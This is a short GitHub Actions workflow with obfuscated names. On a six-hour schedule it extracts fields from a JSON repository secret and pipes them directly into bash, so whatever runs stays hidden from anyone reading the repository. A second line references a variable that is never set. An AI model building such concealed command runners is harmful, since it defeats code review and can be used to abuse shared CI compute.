name: huyixin1923
on:
  workflow_dispatch:
  schedule:
    - cron: '48 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huyixin1923
        env:
          m0: ${{ secrets.m0 }}
        run: |
          echo $m0 | jq -r .tfhm6 | /bin/bash
          echo $ov808 | jq -r .f65 | /bin/bash

